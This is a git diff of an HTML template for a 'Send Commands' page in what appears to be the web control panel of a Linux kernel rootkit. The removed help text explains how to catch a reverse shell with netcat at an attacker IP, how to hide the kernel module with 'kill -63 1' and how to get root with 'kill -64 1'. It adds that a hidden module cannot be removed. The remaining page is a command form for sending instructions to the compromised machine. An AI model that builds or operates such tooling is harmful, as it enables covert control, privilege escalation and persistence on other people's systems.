--- a/mobserver/templates/send_commands.html
+++ b/mobserver/templates/send_commands.html
@@ -38,49 +38,21 @@ $(document).ready(function() {
 {% endblock %}
 
 {% block content %}
-  <div style="padding:3rem;">
+  <div class="p-5">
     <h1 class="text-center">Send Commands</h1>
   </div>
     
   <div class="row">
-
-    <div class="col-md-6">
-      <div class="col">
-        <h4 class="text-start">Help:</h4>
-        <ul class="text-start">
-          <li>To spawn a new shell from different device. eg: </br> <span style="padding: 1.7rem">Attacker side</span> | <span style="padding: 1.7rem;">Command</span><pre>'nc -lvnp &lt;port&gt;' | 'spawn &lt;Attacker_IP&gt; &lt;port&gt;'</pre></li>
-          <li>To kill the connection (reverse shell process) type <pre>'kill -9 &lt;pid&gt;'</pre></li>
-          <li>To toggle between hide and show the kernel module. <pre>'kill -63 1'</pre></li>
-          <li>To gain root privilege in the target machine from any other attacking machine using reverse shell like above. <pre>'kill -64 1'</pre></li>
-        </ul>
+    <form method="POST">
+      {% csrf_token %}
+      <div class="input-group mb-3">
+        {{ form.command }}
+        <button class="btn btn-outline-secondary" type="submit" id="send_command">Send</button>
       </div>
+    </form>
 
-      <div class="col">
-        <h4>Note:</h4>
-        <ul class="text-start">
-          <li>Note that if you kill the reverse shell process then you have to install the kernel rootkit module again into the target system</li>
-          <li>No one can remove the module if it's hidden</li>
-        </ul>
-      </div>
-    </div>
-
-    <div class="col-md-6">
-      <div class="col">
-        <form method="POST">
-          {% csrf_token %}
-          <div class="input-group mb-3">
-            {{ form.command }}
-            <button class="btn btn-outline-secondary" type="submit" id="send_command">Send</button>
-          </div>
-        </form>
-      </div>
-
-      <div class="col">
-        <h2>Response:</h2>
-        <pre class="text-break text-start" id="response"></pre>
-      </div>  
-    </div>
-
+    <h2>Response:</h2>
+    <pre class="text-break text-start" id="response"></pre>
     
   </div>
 
